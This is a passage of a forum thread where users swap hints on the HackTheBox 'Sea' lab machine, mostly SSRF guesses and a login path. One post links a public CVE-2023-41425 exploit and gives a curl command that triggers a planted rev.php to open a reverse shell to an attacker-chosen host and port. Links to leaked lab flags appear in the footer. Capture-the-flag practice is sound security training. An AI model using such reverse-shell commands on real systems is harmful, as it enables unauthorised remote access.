[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
Banned

Posts: 33
Threads: 3
Joined: Sep 2023
Reputation: 27

#31
08-10-2024, 09:14 PM
Right now im kind of thinking some kind of SSRF (server side request forgery vulerability on that contact.php form. ) Since it seems to be reaching out to what ever website we put in the form

might be possible to have it reach out to the box its self making request to access resources on the box from its self thus bypassing normal security policies cause the box trust its self.
Ban reason: Asking for reputation (Permanent)
Reply
RaidForums
Member
Posts: 2
Threads: 0
Joined: Aug 2024
Reputation: 0

#32
08-10-2024, 09:17 PM
https://packetstormsecurity.com/files/17...ution.html

try this
Reply
Banned

Posts: 200
Threads: 14
Joined: Apr 2024
Reputation: 17

#33
08-10-2024, 09:21 PM
(08-10-2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
RaidForums
Member
Posts: 26
Threads: 0
Joined: Aug 2024
Reputation: 0

#34
08-10-2024, 09:21 PM
(08-10-2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

did you find the login page?
Reply
RaidForums
Member
Posts: 24
Threads: 2
Joined: Jul 2024
Reputation: 1

#35
08-10-2024, 09:23 PM
(08-10-2024, 09:21 PM)osamy7593 Wrote:
(08-10-2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else
Reply
RaidForums
Member
Posts: 12
Threads: 0
Joined: Jul 2024
Reputation: 0

#36
08-10-2024, 09:27 PM
(08-10-2024, 09:23 PM)kewlcat002 Wrote:
(08-10-2024, 09:21 PM)osamy7593 Wrote:
(08-10-2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else

yes there is, check /loginURL
Reply
RaidForums
Member
Posts: 9
Threads: 0
Joined: Jun 2024
Reputation: 0

#37
08-10-2024, 09:32 PM
login page
http://sea.htb/index.php?page=loginURL
Reply
Banned

Posts: 72
Threads: 16
Joined: Jul 2024
Reputation: 0

#38
08-10-2024, 09:34 PM
USER FLAG
https://github.com/prodigiousMind/CVE-2023-41425    Use this exploit for revshell and listen in an port then run the command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.x.x&lport=9001'
Ban reason: Selling in HTB | Trying to sell information posted for free (Permanent)
Reply
RaidForums
Member
Posts: 2
Threads: 0
Joined: Aug 2024
Reputation: 0

#39
08-10-2024, 09:34 PM
(08-10-2024, 09:23 PM)kewlcat002 Wrote:
(08-10-2024, 09:21 PM)osamy7593 Wrote:
(08-10-2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else

yes please check man
Reply
RaidForums
Member
Posts: 11
Threads: 0
Joined: Mar 2024
Reputation: 0

#40
08-10-2024, 09:38 PM
I think SSRF is the way to exploit the server. Found that the server hitting back to the attack machine. It need to bypass something I think.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)